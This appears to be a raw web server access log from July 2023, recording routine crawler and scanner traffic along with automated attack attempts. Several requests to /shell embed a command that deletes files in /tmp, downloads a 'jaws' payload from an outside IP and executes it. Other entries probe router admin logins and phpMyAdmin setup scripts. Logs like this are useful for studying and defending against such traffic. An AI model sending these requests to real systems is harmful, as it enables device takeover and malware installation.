"GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 378 "-" "-" 84.174.149.99 - - [23/Jul/2023:20:36:45 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 156.195.163.30 - - [23/Jul/2023:20:41:13 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251.176/jaws;sh+/tmp/jaws" 400 383 "-" "-" 94.102.61.10 - - [23/Jul/2023:20:47:35 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "python-requests/2.26.0" 94.102.61.10 - - [23/Jul/2023:20:47:35 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.26.0" 156.212.195.139 - - [23/Jul/2023:20:54:07 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251.176/jaws;sh+/tmp/jaws" 400 383 "-" "-" 167.71.199.32 - - [23/Jul/2023:20:58:00 +0200] "GET / HTTP/1.1" 200 274 "-" "Linux Gnu (cow)" 41.238.38.232 - - [23/Jul/2023:21:04:17 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251.176/jaws;sh+/tmp/jaws" 400 383 "-" "-" 41.238.38.232 - - [23/Jul/2023:21:04:18 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251.176/jaws;sh+/tmp/jaws" 400 383 "-" "-" 15.206.235.52 - - [23/Jul/2023:21:27:12 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 46.101.15.234 - - [23/Jul/2023:21:35:42 +0200] "\x16\x03\x01" 400 383 "-" "-" 46.101.15.234 - - [23/Jul/2023:21:35:42 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)" 46.101.15.234 - - [23/Jul/2023:21:35:42 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 46.101.15.234 - - [23/Jul/2023:21:35:42 +0200] "GET /1.php HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 46.101.15.234 - - [23/Jul/2023:21:35:42 +0200] "GET /bundle.js HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 46.101.15.234 - - [23/Jul/2023:21:35:42 +0200] "GET /files/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 92.118.39.40 - - [23/Jul/2023:22:08:56 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 35.240.121.17 - - [23/Jul/2023:22:13:49 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.31.0" 141.98.6.120 - - [23/Jul/2023:23:24:57 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 107.170.234.30 - - [23/Jul/2023:23:38:02 +0200] "MGLNDD_212.69.160.11_80" 400 383 "-" "-" 141.98.11.207 - - [23/Jul/2023:23:40:18 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 207.46.13.211 - - [23/Jul/2023:23:44:47 +0200] "GET /sitemap_index.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" 207.46.13.211 - - [24/Jul/2023:00:50:15 +0200] "GET /sitemap_index.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" 95.214.27.39 - - [24/Jul/2023:01:00:54 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 95.214.27.39 - - [24/Jul/2023:01:00:54 +0200] "POST /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 373 "http://212.69.160.11/phpMyAdmin/scripts/setup.php" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"